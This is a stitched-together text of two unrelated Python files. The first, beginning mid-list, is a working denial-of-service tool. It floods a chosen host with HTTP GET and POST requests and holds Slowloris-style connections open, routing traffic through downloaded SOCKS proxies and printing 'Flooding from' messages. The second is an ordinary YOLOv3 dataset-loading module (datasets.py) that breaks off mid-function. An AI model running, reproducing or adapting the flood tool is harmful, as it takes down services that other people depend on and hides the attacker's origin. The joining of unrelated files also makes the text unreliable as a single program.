"Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)",
"Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5",
"Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20",
"Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a",
"Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2",
"Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ",
"Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre",
"Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2",
"Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0",
"Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1",
"Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15",
"Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko",
"Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025",
"Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1",
"Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1",
"Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)",
"Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.5",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330",
"Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)",
"Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8",
"Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0",
"Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9",
"Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12",
"Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0",
"Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15",
"Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3",
"Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0",
"Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN",
"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN",
"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",]
acceptall = [
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept-Encoding: gzip, deflate\r\n",
"Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: iso-8859-1\r\nAccept-Encoding: gzip\r\n",
"Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n",
"Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Encoding: gzip\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n,"
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xhtml+xml",
"Accept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\n",
"Accept: text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",]
def cc():
get_host = "GET " + url2 + " HTTP/1.1\r\nHost: " + ip + "\r\n"
connection = "Connection: Keep-Alive\r\n"
useragent = "User-Agent: " + random.choice(useragents) + "\r\n"
accept = random.choice(acceptall)
referer = "Referer: https://www.google.com/?search="+ ip + url2 + "\r\n"
request = get_host + referer + useragent + accept + connection + "\r\n"
proxy = random.choice(proxies).strip().split(":")
while True:
try:
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True)
s = socks.socksocket()
s.connect((str(ip), int(port)))
if str(port) == '443':
s = ssl.wrap_socket(s)
n = "HTTPS"
else:
n = "CC"
s.send(str.encode(request))
print ("[*] "+n+" Flooding from --> "+str(proxy[0])+":"+str(proxy[1]))
try:
for y in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
try:
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True)
s.connect((str(ip), int(port)))
if str(port) == '443':
s = ssl.wrap_socket(s)
n = "HTTPS"
else:
n = "CC"
s.send(str.encode(request))
print ("[*] "+n+" Flooding from --> "+str(proxy[0])+":"+str(proxy[1]))
try:
for y in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
print ("[!] Connection Error")
s.close()
def post():
post_host = "POST " + url2 + " HTTP/1.1\r\nHost: "+ ip + "\r\n"
content = "Content-Type: application/x-www-form-urlencoded\r\n"
length = "Content-Length: 0 \r\nConnection: Keep-Alive\r\n"
refer = "Referer: http://"+ ip + url2 + "\r\n"
user_agent = "User-Agent: " + random.choice(useragents) + "\r\n"
accept = random.choice(acceptall)
#data = str(random._urandom(16)) // You can enable bring data in HTTP Header
request = post_host + accept + refer + content + user_agent + length + "\r\n"# + data
proxy = random.choice(proxies).strip().split(":")
while True:
try:
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True)
s = socks.socksocket()
s.connect((str(ip), int(port)))
if str(port) == '443': # //AUTO Enable SSL MODE :)
s = ssl.wrap_socket(s)
else:
pass
s.send(str.encode(request))
print ("[*] HTTP Post Flooding from --> "+str(proxy[0])+":"+str(proxy[1]))
try:
for y in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
try:
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True)
s = socks.socksocket()
s.connect((str(ip), int(port)))
if str(port) == '443':
s = ssl.wrap_socket(s)
else:
pass
s.send(str.encode(request))
print ("[*] HTTP Post Flooding from --> "+str(proxy[0])+":"+str(proxy[1]))
try:
for y in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
print ("[!] Connection Error")
s.close()
def slow():
time.sleep(1)# SLow Mode
proxy = random.choice(proxies).strip().split(":")
try:
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True)
s = socks.socksocket()
s.connect((str(ip), int(port)))
if str(port) == '443':
s = ssl.wrap_socket(s)
else:
pass
s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8"))# Slowloris format header
s.send("User-Agent: {}\r\n".format(random.choice(useragents)).encode("utf-8"))
s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
s.send(("Connection:keep-alive").encode("utf-8"))
print("[*] Slow attack from --> "+str(proxy[0])+":"+str(proxy[1]))
while True:
time.sleep(14)
s.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8"))
print("[*] Resent from --> "+str(proxy[0])+":"+str(proxy[1]))
except:
s.close()
print("[!] Socks Down")
slow()
def main():
global ip
global url2
global port
global proxies
global multiple
mode = str(input("> Choose Your Mode (cc/post/slow) :"))
ip = str(input("> Host/Ip:"))
if mode == "slow":
pass
else:
url = str(input("> Page you want to attack(default=/):"))
port = str(input("> Port(Https default is 443):"))
if port == '':
port = int(80)
print("> Default choose port 80\r\n> Port 80 was chosen")
else:
port = int(port)
if str(port) == '443':
print(" [!] Enable SSL Mode")
thread_num = int(input("> Threads:"))
N = str(input("> Do you need to get socks5 list?(y/n):"))
if N == 'y':
r = requests.get("https://www.proxy-list.download/api/v1/get?type=socks5")
with open("socks.txt",'wb') as f:
f.write(r.content)
print("\r\n [!] Have already download socks5 list as socks.txt\r\n")
else:
pass
out_file = str(input("> Proxy file path(socks.txt):"))
if out_file == '':
out_file = str("socks.txt")
else:
out_file = str(out_file)
print ("> Number Of Proxies: %s" %(len(open(out_file).readlines())))
proxies = open(out_file).readlines()
time.sleep(0.03)
if mode == "slow":
for i in range(thread_num):
th = threading.Thread(target = slow)
th.start()
time.sleep(0.08)
else:
multiple = int(input("> Input the Magnification:"))
if url == '':
url2 = "/"
else:
url2 = str(url)
if mode == "slow":
for i in range(thread_num):
th = threading.Thread(target = slow)
th.start()
time.sleep(0.08)
elif mode == "post":
for i in range(thread_num):
th = threading.Thread(target = post)
th.start()
elif mode == "cc":
for i in range(thread_num):
th = threading.Thread(target = cc)
th.start()
else:
print("[!] Input Error")
sys.exit()
if __name__ == "__main__":
main()
|
datasets.py
|
import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.utils import xyxy2xywh, xywh2xyxy
help_url = 'https://github.com/ultralytics/yolov3/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
vid_formats = ['.mov', '.avi', '.mp4']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
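# Illustrative example (not part of the original module; the filename is assumed):
# for a photo stored landscape but tagged with EXIF orientation 6 or 8,
# exif_size returns the displayed (rotated) size, e.g.
#   exif_size(Image.open('portrait.jpg'))   # -> (3024, 4032) even though img.size == (4032, 3024)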
class LoadImages: # for inference
def __init__(self, path, img_size=416, half=False, verbose=True):
path = str(Path(path)) # os-agnostic
files = []
if os.path.isdir(path):
files = sorted(glob.glob(os.path.join(path, '*.*')))
elif os.path.isfile(path):
files = [path]
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
nI, nV = len(images), len(videos)
self.verbose = verbose
self.img_size = img_size
self.files = images + videos
self.nF = nI + nV # number of files
self.video_flag = [False] * nI + [True] * nV
self.mode = 'images'
self.half = half # half precision fp16 images
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nF > 0, 'No images or videos found in ' + path
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nF:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nF: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
if(self.verbose):
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nF, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
if(self.verbose):
print('image %g/%g %s: ' % (self.count, self.nF, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img, dtype=np.float16 if self.half else np.float32) # uint8 to fp16/fp32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nF # number of files
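# Illustrative LoadImages usage (not part of the original module; the 'samples/'
# directory is an assumption for the sketch):
#   dataset = LoadImages('samples/', img_size=416, half=False)
#   for path, img, img0, vid_cap in dataset:
#       # img  : letterboxed, RGB, CHW, float32 (fp16 if half=True), scaled to [0, 1]
#       # img0 : the original BGR frame as read by OpenCV, for drawing/saving
#       pass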
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=416, half=False):
self.img_size = img_size
self.half = half # half precision fp16 images
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img, dtype=np.float16 if self.half else np.float32) # uint8 to fp16/fp32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=416, half=False):
self.mode = 'images'
self.img_size = img_size
self.half = half # half precision fp16 images
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(0 if s == '0' else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
